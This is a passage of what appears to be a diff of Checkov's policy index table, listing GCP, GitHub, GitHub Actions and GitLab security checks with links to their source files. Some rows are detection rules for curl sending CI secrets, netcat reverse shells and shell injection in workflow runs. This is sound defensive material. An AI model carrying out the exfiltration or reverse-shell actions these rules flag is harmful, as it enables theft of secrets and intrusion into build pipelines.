-| 2315 | CKV2_GCP_5               | resource                         | google_project_iam_audit_config                                                                  | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform               | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                       |
-| 2316 | CKV2_GCP_6               | resource                         | google_kms_crypto_key                                                                            | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform               | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                               |
-| 2317 | CKV2_GCP_6               | resource                         | google_kms_crypto_key_iam_binding                                                                | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform               | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                               |
-| 2318 | CKV2_GCP_6               | resource                         | google_kms_crypto_key_iam_member                                                                 | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform               | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                               |
-| 2319 | CKV2_GCP_7               | resource                         | google_sql_database_instance                                                                     | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform               | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
-| 2320 | CKV2_GCP_7               | resource                         | google_sql_user                                                                                  | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform               | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
-| 2321 | CKV2_GCP_8               | resource                         | google_kms_key_ring                                                                              | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform               | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                   |
-| 2322 | CKV2_GCP_8               | resource                         | google_kms_key_ring_iam_binding                                                                  | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform               | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                   |
-| 2323 | CKV2_GCP_8               | resource                         | google_kms_key_ring_iam_member                                                                   | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform               | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                   |
-| 2324 | CKV2_GCP_9               | resource                         | google_container_registry                                                                        | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform               | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)             |
-| 2325 | CKV2_GCP_9               | resource                         | google_storage_bucket_iam_binding                                                                | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform               | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)             |
-| 2326 | CKV2_GCP_9               | resource                         | google_storage_bucket_iam_member                                                                 | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform               | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)             |
-| 2327 | CKV2_GCP_10              | resource                         | google_cloudfunctions_function                                                                   | Ensure GCP Cloud Function HTTP trigger is secured                                                                                                                                                        | Terraform               | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml)                                                   |
-| 2328 | CKV2_GCP_11              | resource                         | google_project_services                                                                          | Ensure GCP GCR Container Vulnerability Scanning is enabled                                                                                                                                               | Terraform               | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml)                               |
-| 2329 | CKV2_GCP_12              | resource                         | google_compute_firewall                                                                          | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports                                                                                                                      | Terraform               | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml)                   |
-| 2330 | CKV2_GCP_13              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_duration' is set to 'on'                                                                                                                                            | Terraform               | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml)                   |
-| 2331 | CKV2_GCP_14              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off'                                                                                                                                     | Terraform               | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml)     |
-| 2332 | CKV2_GCP_15              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off'                                                                                                                                       | Terraform               | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml)         |
-| 2333 | CKV2_GCP_16              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off'                                                                                                                                      | Terraform               | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml)       |
-| 2334 | CKV2_GCP_17              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off'                                                                                                                                    | Terraform               | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml)   |
-| 2335 | CKV2_GCP_18              | resource                         | google_compute_network                                                                           | Ensure GCP network defines a firewall and does not use the default firewall                                                                                                                              | Terraform               | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml)                                         |
-| 2336 | CKV2_GCP_19              | resource                         | google_container_cluster                                                                         | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled                                                                                                                              | Terraform               | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) |
-| 2337 | CKV2_GCP_20              | resource                         | google_sql_database_instance                                                                     | Ensure MySQL DB instance has point-in-time recovery backup configured                                                                                                                                    | Terraform               | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml)   |
-| 2338 | CKV2_GCP_21              | resource                         | google_notebooks_instance                                                                        | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                          | Terraform               | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml)                                             |
-| 2339 | CKV2_GCP_22              | resource                         | google_document_ai_processor                                                                     | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK)                                                                                                                            | Terraform               | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml)                                   |
-| 2340 | CKV2_GCP_23              | resource                         | google_document_ai_warehouse_location                                                            | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK)                                                                                                                  | Terraform               | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml)                   |
-| 2341 | CKV2_GCP_24              | resource                         | google_vertex_ai_endpoint                                                                        | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK)                                                                                                                                              | Terraform               | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml)                                         |
-| 2342 | CKV2_GCP_25              | resource                         | google_vertex_ai_featurestore                                                                    | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK)                                                                                                                                          | Terraform               | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml)                                 |
-| 2343 | CKV2_GCP_26              | resource                         | google_vertex_ai_tensorboard                                                                     | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK)                                                                                                                                           | Terraform               | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml)                                   |
-| 2344 | CKV2_GCP_27              | resource                         | google_workbench_instance                                                                        | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                | Terraform               | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml)                           |
-| 2345 | CKV2_GCP_28              | resource                         | google_workbench_instance                                                                        | Ensure Vertex AI workbench instances are private                                                                                                                                                         | Terraform               | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml)                                       |
-| 2346 | CKV2_GCP_29              | resource                         | google_dialogflow_agent                                                                          | Ensure logging is enabled for Dialogflow agents                                                                                                                                                          | Terraform               | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml)                                               |
-| 2347 | CKV2_GCP_30              | resource                         | google_dialogflow_cx_agent                                                                       | Ensure logging is enabled for Dialogflow CX agents                                                                                                                                                       | Terraform               | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml)                                           |
-| 2348 | CKV2_GCP_31              | resource                         | google_dialogflow_cx_webhook                                                                     | Ensure logging is enabled for Dialogflow CX webhooks                                                                                                                                                     | Terraform               | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml)                                       |
-| 2349 | CKV2_GCP_32              | resource                         | google_tpu_v2_vm                                                                                 | Ensure TPU v2 is private                                                                                                                                                                                 | Terraform               | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml)                                                             |
-| 2350 | CKV2_GCP_33              | resource                         | google_vertex_ai_endpoint                                                                        | Ensure Vertex AI endpoint is private                                                                                                                                                                     | Terraform               | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml)                                                           |
-| 2351 | CKV2_GCP_34              | resource                         | google_vertex_ai_index_endpoint                                                                  | Ensure Vertex AI index endpoint is private                                                                                                                                                               | Terraform               | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml)                                                 |
-| 2352 | CKV2_GCP_35              | resource                         | google_notebooks_runtime                                                                         | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK)                                                                                                                                  | Terraform               | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml)                                               |
-| 2353 | CKV2_GCP_36              | resource                         | google_notebooks_runtime                                                                         | Ensure Vertex AI runtime is private                                                                                                                                                                      | Terraform               | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml)                                                                 |
-| 2354 | CKV_GHA_1                | jobs                             | jobs                                                                                             | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables                                                                                                                               | github_actions          | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py)                                                                       |
-| 2355 | CKV_GHA_1                | jobs                             | jobs.*.steps[]                                                                                   | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables                                                                                                                               | github_actions          | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py)                                                                       |
-| 2356 | CKV_GHA_2                | jobs                             | jobs                                                                                             | Ensure run commands are not vulnerable to shell injection                                                                                                                                                | github_actions          | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py)                                                                                               |
-| 2357 | CKV_GHA_2                | jobs                             | jobs.*.steps[]                                                                                   | Ensure run commands are not vulnerable to shell injection                                                                                                                                                | github_actions          | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py)                                                                                               |
-| 2358 | CKV_GHA_3                | jobs                             | jobs                                                                                             | Suspicious use of curl with secrets                                                                                                                                                                      | github_actions          | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py)                                                                                     |
-| 2359 | CKV_GHA_3                | jobs                             | jobs.*.steps[]                                                                                   | Suspicious use of curl with secrets                                                                                                                                                                      | github_actions          | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py)                                                                                     |
-| 2360 | CKV_GHA_4                | jobs                             | jobs                                                                                             | Suspicious use of netcat with IP address                                                                                                                                                                 | github_actions          | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py)                                                                                       |
-| 2361 | CKV_GHA_4                | jobs                             | jobs.*.steps[]                                                                                   | Suspicious use of netcat with IP address                                                                                                                                                                 | github_actions          | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py)                                                                                       |
-| 2362 | CKV_GHA_5                | jobs                             | jobs                                                                                             | Found artifact build without evidence of cosign sign execution in pipeline                                                                                                                               | github_actions          | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py)                                                                                             |
-| 2363 | CKV_GHA_6                | jobs                             | jobs                                                                                             | Found artifact build without evidence of cosign sbom attestation in pipeline                                                                                                                             | github_actions          | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py)                                                                                                       |
-| 2364 | CKV_GHA_7                | jobs                             | on                                                                                               | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty.                        | github_actions          | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py)                                                                                 |
-| 2365 | CKV2_GHA_1               | resource                         | permissions                                                                                      | Ensure top-level permissions are not set to write-all                                                                                                                                                    | github_actions          | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml)                                                        |
-| 2366 | CKV_GIT_1                | resource                         | github_repository                                                                                | Ensure GitHub repository is Private                                                                                                                                                                      | Terraform               | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py)                                                                                              |
-| 2367 | CKV_GIT_2                | resource                         | github_repository_webhook                                                                        | Ensure GitHub repository webhooks are using HTTPS                                                                                                                                                        | Terraform               | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py)                                                                                |
-| 2368 | CKV_GIT_3                | resource                         | github_repository                                                                                | Ensure GitHub repository has vulnerability alerts enabled                                                                                                                                                | Terraform               | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py)                                              |
-| 2369 | CKV_GIT_4                | resource                         | github_actions_environment_secret                                                                | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform               | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                    |
-| 2370 | CKV_GIT_4                | resource                         | github_actions_organization_secret                                                               | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform               | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                    |
-| 2371 | CKV_GIT_4                | resource                         | github_actions_secret                                                                            | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform               | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                    |
-| 2372 | CKV_GIT_5                | resource                         | github_branch_protection                                                                         | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform               | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                            |
-| 2373 | CKV_GIT_5                | resource                         | github_branch_protection_v3                                                                      | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform               | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                            |
-| 2374 | CKV_GIT_6                | resource                         | github_branch_protection                                                                         | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform               | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                            |
-| 2375 | CKV_GIT_6                | resource                         | github_branch_protection_v3                                                                      | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform               | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                            |
-| 2376 | CKV2_GIT_1               | resource                         | github_repository                                                                                | Ensure each Repository has branch protection associated                                                                                                                                                  | Terraform               | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml)                                                  |
-| 2377 | CKV_GITHUB_1             | github_configuration             | *                                                                                                | Ensure GitHub organization security settings require 2FA                                                                                                                                                 | github_configuration    | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py)                                                                                                                                 |
-| 2378 | CKV_GITHUB_2             | github_configuration             | *                                                                                                | Ensure GitHub organization security settings require SSO                                                                                                                                                 | github_configuration    | [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py)                                                                                                                                 |
-| 2379 | CKV_GITHUB_3             | github_configuration             | *                                                                                                | Ensure GitHub organization security settings has IP allow list enabled                                                                                                                                   | github_configuration    | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py)                                                                                                                 |
-| 2380 | CKV_GITHUB_4             | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | github_configuration    | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py)                                                                                                   |
-| 2381 | CKV_GITHUB_5             | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules does not allow force pushes                                                                                                                                        | github_configuration    | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py)                                                                                             |
-| 2382 | CKV_GITHUB_6             | github_configuration             | *                                                                                                | Ensure GitHub organization webhooks are using HTTPS                                                                                                                                                      | github_configuration    | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py)                                                                                                 |
-| 2383 | CKV_GITHUB_7             | github_configuration             | *                                                                                                | Ensure GitHub repository webhooks are using HTTPS                                                                                                                                                        | github_configuration    | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py)                                                                                               |
-| 2384 | CKV_GITHUB_8             | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules requires linear history                                                                                                                                            | github_configuration    | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py)                                                                                           |
-| 2385 | CKV_GITHUB_9             | github_configuration             | *                                                                                                | Ensure 2 admins are set for each repository                                                                                                                                                              | github_configuration    | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py)                                                                                       |
-| 2386 | CKV_GITHUB_10            | github_configuration             | *                                                                                                | Ensure branch protection rules are enforced on administrators                                                                                                                                            | github_configuration    | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py)                                                                       |
-| 2387 | CKV_GITHUB_11            | github_configuration             | *                                                                                                | Ensure GitHub branch protection dismisses stale review on new commit                                                                                                                                     | github_configuration    | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py)                                                                                             |
-| 2388 | CKV_GITHUB_12            | github_configuration             | *                                                                                                | Ensure GitHub branch protection restricts who can dismiss PR reviews                                                                                                                                     | github_configuration    | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py)                                                                               |
-| 2389 | CKV_GITHUB_13            | github_configuration             | *                                                                                                | Ensure GitHub branch protection requires CODEOWNER reviews                                                                                                                                               | github_configuration    | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py)                                                                                   |
-| 2390 | CKV_GITHUB_14            | github_configuration             | *                                                                                                | Ensure all checks have passed before the merge of new code                                                                                                                                               | github_configuration    | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py)                                                                                       |
-| 2391 | CKV_GITHUB_15            | github_configuration             | *                                                                                                | Ensure inactive branches are reviewed and removed periodically                                                                                                                                           | github_configuration    | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py)                                                                         |
-| 2392 | CKV_GITHUB_16            | github_configuration             | *                                                                                                | Ensure GitHub branch protection requires conversation resolution                                                                                                                                         | github_configuration    | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py)                                                                         |
-| 2393 | CKV_GITHUB_17            | github_configuration             | *                                                                                                | Ensure GitHub branch protection requires push restrictions                                                                                                                                               | github_configuration    | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py)                                                                                     |
-| 2394 | CKV_GITHUB_18            | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules does not allow deletions                                                                                                                                           | github_configuration    | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py)                                                                                     |
-| 2395 | CKV_GITHUB_19            | github_configuration             | *                                                                                                | Ensure any change to code receives approval of two strongly authenticated users                                                                                                                          | github_configuration    | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py)                                                                                                   |
-| 2396 | CKV_GITHUB_20            | github_configuration             | *                                                                                                | Ensure open git branches are up to date before they can be merged into codebase                                                                                                                          | github_configuration    | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py)                                                                                     |
-| 2397 | CKV_GITHUB_21            | github_configuration             | *                                                                                                | Ensure public repository creation is limited to specific members                                                                                                                                         | github_configuration    | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py)                                                             |
-| 2398 | CKV_GITHUB_22            | github_configuration             | *                                                                                                | Ensure private repository creation is limited to specific members                                                                                                                                        | github_configuration    | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py)                                                           |
-| 2399 | CKV_GITHUB_23            | github_configuration             | *                                                                                                | Ensure internal repository creation is limited to specific members                                                                                                                                       | github_configuration    | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py)                                                         |
-| 2400 | CKV_GITHUB_26            | github_configuration             | *                                                                                                | Ensure minimum admins are set for the organization                                                                                                                                                       | github_configuration    | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py)                                                                                             |
-| 2401 | CKV_GITHUB_27            | github_configuration             | *                                                                                                | Ensure strict base permissions are set for repositories                                                                                                                                                  | github_configuration    | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py)                                                   |
-| 2402 | CKV_GITHUB_28            | github_configuration             | *                                                                                                | Ensure an organization's identity is confirmed with a Verified badge Passed                                                                                                                              | github_configuration    | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py)                                                                             |
-| 2403 | CKV_GITLAB_1             | gitlab_configuration             | *                                                                                                | Merge requests should require at least 2 approvals                                                                                                                                                       | gitlab_configuration    | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py)                                                                                       |
-| 2404 | CKV_GITLAB_2             | gitlab_configuration             | *                                                                                                | Ensure all Gitlab groups require two factor authentication                                                                                                                                               | gitlab_configuration    | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py)                                                                                     |
-| 2405 | CKV_GITLABCI_1           | jobs                             | *.script[]                                                                                       | Suspicious use of curl with CI environment variables in script                                                                                                                                           | gitlab_ci               | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py)                                                                                          |
